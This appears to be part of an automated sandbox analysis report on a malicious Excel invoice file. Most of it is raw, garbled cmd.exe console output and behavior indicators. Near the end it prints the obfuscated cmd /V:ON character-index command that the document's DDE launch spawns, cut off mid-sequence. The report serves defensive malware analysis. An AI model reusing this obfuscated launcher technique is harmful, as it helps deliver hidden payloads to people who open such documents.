Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.9. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A..UE.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.8wE.\...\......w..A...1.....l..l........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.8.1.,.1.!. .................A..@....A.8wE.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......+...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......1...........................+.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................8.1. .=.=. .9.0. ...7...........................<.......1................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......=....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......I...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......P.............................E...A...E...1.`.E...A..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......\.............................A..@....A.8wE.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A.8wE.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......h...........................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......n...........................h.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .....t...........................<.......n................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......z....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.8wE.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.X.E.X...X......w..A...1.....D..D........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.,.1.!. ...................A..@....A.X.E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.x.E.X...X......w..A...1.....D..D........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.,.1.!. ...................A..@....A.x.E.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......%...................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7. .=.=. .9.0. .....+...........................<.......%................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......1....................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......=...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......D...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......P.............................A..@....A.x.E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A.x.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......\...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......b...........................\.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...h...........................<.......b................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......n....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......z...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.x.E.\...\......w..A...1.....k..{........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.5.,.1.!. .................A..@....A.x.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.x.E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A.x.E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.....h..h........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.0.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......%....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......1...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......8............................?F...A..?F...1...F...A..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......D.............................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.7.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......P...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......V...........................P.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.7. .=.=. .9.0. ...\...........................<.......V................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......b....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......n...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......u...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.....#..5........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A...E.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...E.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.0. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...F.\...\......w..A...1.....f..f........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.9.,.1.!. .................A..@....A...F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5.9. .=.=. .9.0. ... ...........................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......&....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......2...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......9...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......E.............................A..@....A...F.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.6.5.,.1.!. .................A..@....A...F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......Q...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......W...........................Q.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................6.5. .=.=. .9.0. ...]...........................<.......W................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......c....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......o...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......v...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...F.X...X......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.7.,.1.!. ...................A..@....A...F.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................7. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A...F.X...X......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.5.,.1.!. ...................A..@....A...F.=Me.X.1...1.(....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.(.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................5. .=.=. .9.0. .................................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............QFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.X"F.\...\......w..A...1.....J..J........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.9.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.9. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......&...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......-.............................F...A...F...1..cF...A..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......9.............................A..@....A.X"F.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.2.0.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<.......E...........................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<.......K...........................E.......................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................2.0. .=.=. .9.0. ...Q...........................<.......K................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<.......W....................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......c...........................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<.......j...........................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.......v.............................A..@....A.X"F.\...\......w..A...1.................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.4.8.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................4.8. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................n.\.D.o.c.u.m.e.n.t.s.>..Ne...1.x.1......EcJ....p.1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................s.e.t...4...<.....................................A..@....A.X"F.\...\......w..A...1.....<..<........Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .h.o.R.=.!.h.o.R.!.!.d.0.:.~.1.7.,.1.!. .................A..@....A.X"F.=Me.X.1...1.*....EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: .................... .&.&. .4...<...................................X.1...f.*.....f..........Me.t.1...1......FcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................i.f. ...4...<...........................................................=Me.X.1...1......EcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................1.7. .=.=. .9.0. ...............................<........................Le.4.1...1.....`IcJ......1.Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ....................c.m.d...4...<............................................Le.4.1...f.......f.......1.............SFdJJump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ............................4...<...................................@FdJ......1.......1..maJMMe...1...1......EcJ......1.Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\clip.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by AntivirusShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsvirustotal: Detection: 34%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
